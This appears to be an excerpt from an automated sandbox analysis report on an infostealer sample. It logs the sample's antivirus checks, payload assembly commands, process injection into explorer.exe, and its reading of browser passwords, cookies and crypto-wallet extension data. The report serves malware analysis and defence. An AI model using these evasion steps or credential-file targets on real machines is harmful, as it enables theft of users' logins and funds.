          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 4988 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968 Thread sleep count: 2267 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968 Thread sleep count: 1869 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268 Thread sleep time: -540000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268 Thread sleep count: 35 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268 Thread sleep time: -1050000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2352 Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\215655
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\215655\
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 172.67.182.119 80
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Memory allocated: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 10F0000 protect: page read and write
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe NtSetInformationThread: Direct from: 0xA09CC9
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe NtQuerySystemInformation: Direct from: 0x776D7B2E
          Source: C:\Windows\SysWOW64\more.com Memory written: PID: 2120 base: 10179C0 value: 55
          Source: C:\Windows\SysWOW64\more.com Memory written: PID: 2120 base: 34C8008 value: 00
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
          Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Memory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 10F0000
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Memory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 8E02D8
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Memory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 8E11E8
          Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 10179C0
          Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 34C8008
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
          Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe Process created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe Queries volume information: C:\Users\user\AppData\Local\Temp\f8077211 VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara matchFile source: 0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
